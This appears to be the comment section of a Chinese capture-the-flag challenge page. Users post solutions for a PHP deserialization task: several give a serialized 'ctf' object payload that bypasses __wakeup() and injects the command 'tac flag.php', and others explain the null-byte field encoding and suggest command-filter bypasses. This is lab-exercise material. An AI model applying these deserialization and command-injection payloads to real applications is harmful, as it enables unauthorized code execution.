评分(4)
解题动态
HexHackerCat 攻破了该题 1天前
hyj11125 攻破了该题 2天前
sycazdcy 攻破了该题 2天前
有点易斯但不多 攻破了该题 4天前
qwewqdsf 攻破了该题 5天前
lee8ly 攻破了该题 5天前
SamJij 攻破了该题 6天前
wzq6 攻破了该题 6天前
sqwq 攻破了该题 8天前
沧颜 攻破了该题 10天前
小马哥 攻破了该题 10天前
wasdwq 攻破了该题 13天前
17586557508 攻破了该题 16天前
lanza2451150 攻破了该题 17天前
ccllll 攻破了该题 19天前
w111 攻破了该题 19天前
H8Y8H 攻破了该题 19天前
1348931180 攻破了该题 19天前
Newdap 攻破了该题 26天前
评论
harry2025 2月前
举报
http://171.80.2.169:14918?code=O:3:"ctf":3:{s:11:"%00*%00username";s:5:"admin";s:6:"%00*%00cmd";s:12:"tac flag.php";}
陈亮 3月前
举报
flag{***}
网恋秀牛子被录屏导致自卑 3月前
举报
执行命令时,我用的“cp flag.php flag.txt”绕过,这样的话就复制了文件,然后直接访问flag.txt就行,屏幕输出NULL是因为这个命令没有输出的,但执行了。
admit 7月前
举报
/?code=O:3:%22ctf%22:3:{s:11:%22%00*%00username%22;s:5:%22admin%22;s:6:%22%00*%00cmd%22;s:12:%22tac%20flag.php%22;}
iNMB 8月前
举报
此外必须用 %00(空字符),不能用 %20(空格)。 protected 声明的字段为保护字段,在所声明的类和该类的子类中可见,但在该类的对象实例中不可见。 因此保护字段的字段名在序列化时,字段名前面会加上 \0*\0 的前缀,注意,这里的 \0 表示 ASCII 码为 0 的字符,也就是我们经过 urlencode 后看到的 %00 。
iNMB 8月前
举报
绕过__wakeup()后使用tac等其他输出字符的命令即可
llc123 10月前
举报
c\at flag.php也行
pezn1and 11月前
举报
code=O:3:"ctf":3:{s:11:"%00*%00username";s:5:"admin";s:6:"%00*%00cmd";s:12:"tac flag.php";}
zbss 11月前
举报
备份网站没有文件,环境出问题了吧,退钱,我还试了两次
iamblue 1年前
举报
O%3A3%3A%22ctf%22%3A3%3A%7Bs%3A11%3A%22%00%2A%00username%22%3Bs%3A5%3A%22admin%22%3Bs%3A6%3A%22%00%2A%00cmd%22%3Bs%3A12%3A%22tac+flag.php%22%3B%7D